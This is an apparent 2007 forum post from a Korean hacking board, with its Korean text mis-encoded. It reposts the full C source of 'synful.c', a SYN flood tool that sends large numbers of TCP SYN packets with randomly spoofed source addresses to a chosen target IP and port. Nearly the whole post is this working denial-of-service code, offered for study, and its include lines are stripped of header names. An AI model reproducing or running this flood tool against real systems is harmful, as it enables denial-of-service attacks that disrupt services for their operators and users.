|
http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=848 [º¹»ç]
ÇÁ·Î±×·¥ À̸§Àº SYNFUL.C¶ó³×¿ä. CÃʺ¸ºÐµéµµ Ã¥µé°í 20ºÐ¸¸ ÅõÀÚÇÏ½Ã¸é ½¬¿ï°Ì´Ï´Ù.
------------------------------------------------------------------------------------------------------------------------
/* synful.c - SYN (SYN/ACK and ACK blow) written by \\StOrM\\ */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
void dosynpacket(unsigned int, unsigned int, unsigned short, unsigned short);
unsigned short in_cksum(unsigned short *, int);
unsigned int host2ip(char *);
main(int argc, char **argv)
{
unsigned int srchost;
char tmpsrchost[12];
int i,s1,s2,s3,s4;
unsigned int dsthost;
unsigned short port=80;
unsigned short random_port;
unsigned int number=1000;
printf("synful [It's so synful to send those spoofed SYN's]\n");
printf("Hacked out by \\\\StOrM\\\\\n\n");
if(argc < 2)
{
printf("syntax: synful targetIP\n", argv[0]);
exit(0);
}
initrand();
dsthost = host2ip(argv[1]);
if(argc >= 3) port = atoi(argv[2]);
if(argc >= 4) number = atoi(argv[3]);
if(port == 0) port = 80;
if(number == 0) number = 1000;
printf("Destination : %s\n",argv[1]);
printf("Port : %u\n",port);
printf("NumberOfTimes: %d\n\n", number);
for(i=0;i < number;i++)
{
s1 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));
s2 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));
s3 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));
s4 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));
random_port = 1+(int) (10000.0*rand()/(RAND_MAX+1.0));
sprintf(tmpsrchost,"%d.%d.%d.%d",s1,s2,s3,s4);
printf("Being Synful to %s at port %u from %s port %u\n", argv[1], port, tmpsrchost, random_port);
srchost = host2ip(tmpsrchost);
dosynpacket(srchost, dsthost, port, random_port);
}
}
void dosynpacket(unsigned int source_addr, unsigned int dest_addr, unsigned short dest_port, unsigned short ran_port) {
struct send_tcp
{
struct iphdr ip;
struct tcphdr tcp;
} send_tcp;
struct pseudo_header
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
} pseudo_header;
int tcp_socket;
struct sockaddr_in sin;
int sinlen;
/* form ip packet */
send_tcp.ip.ihl = 5;
send_tcp.ip.version = 4;
send_tcp.ip.tos = 0;
send_tcp.ip.tot_len = htons(40);
send_tcp.ip.id = ran_port;
send_tcp.ip.frag_off = 0;
send_tcp.ip.ttl = 255;
send_tcp.ip.protocol = IPPROTO_TCP;
send_tcp.ip.check = 0;
send_tcp.ip.saddr = source_addr;
send_tcp.ip.daddr = dest_addr;
/* form tcp packet */
send_tcp.tcp.source = ran_port;
send_tcp.tcp.dest = htons(dest_port);
send_tcp.tcp.seq = ran_port;
send_tcp.tcp.ack_seq = 0;
send_tcp.tcp.res1 = 0;
send_tcp.tcp.doff = 5;
send_tcp.tcp.fin = 0;
send_tcp.tcp.syn = 1;
send_tcp.tcp.rst = 0;
send_tcp.tcp.psh = 0;
send_tcp.tcp.ack = 0;
send_tcp.tcp.urg = 0;
send_tcp.tcp.res2 = 0;
send_tcp.tcp.window = htons(512);
send_tcp.tcp.check = 0;
send_tcp.tcp.urg_ptr = 0;
/* setup the sin struct */
sin.sin_family = AF_INET;
sin.sin_port = send_tcp.tcp.source;
sin.sin_addr.s_addr = send_tcp.ip.daddr;
/* (try to) open the socket */
tcp_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(tcp_socket < 0)
{
perror("socket");
exit(1);
}
/* set fields that need to be changed */
send_tcp.tcp.source++;
send_tcp.ip.id++;
send_tcp.tcp.seq++;
send_tcp.tcp.check = 0;
send_tcp.ip.check = 0;
/* calculate the ip checksum */
send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
/* set the pseudo header fields */
pseudo_header.source_address = send_tcp.ip.saddr;
pseudo_header.dest_address = send_tcp.ip.daddr;
pseudo_header.placeholder = 0;
pseudo_header.protocol = IPPROTO_TCP;
pseudo_header.tcp_length = htons(20);
bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32);
sinlen = sizeof(sin);
sendto(tcp_socket, &send_tcp, 40, 0, (struct sockaddr *)&sin, sinlen);
close(tcp_socket);
}
unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/
sum = 0;
while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1) {
oddbyte = 0; /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
sum += oddbyte;
}
/*
* Add back carry outs from top 16 bits to low 16 bits.
*/
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return(answer);
}
unsigned int host2ip(char *hostname)
{
static struct in_addr i;
struct hostent *h;
i.s_addr = inet_addr(hostname);
if(i.s_addr == -1)
{
h = gethostbyname(hostname);
if(h == NULL)
{
fprintf(stderr, "cant find %s!\n", hostname);
exit(0);
}
bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
}
return i.s_addr;
}
void initrand(void)
{
struct timeval tv;
gettimeofday(&tv, (struct timezone *) NULL);
srand(tv.tv_usec);
}
-³¡-
¾ÆÁ÷µµ DOS´Â Çѱ¹¿¡¼± ¸¹ÀÌ °ø°ÝµÇ´ÂµíÇϳ׿ä ÀÌ ¼Ò½º¸¦ Àߺ¸½Ã°í °øºÎ
¿½ÉÈ÷ Çϱæ
|
Hit : 10518 Date : 2007/08/28 03:32
|
1581, 
11/80 
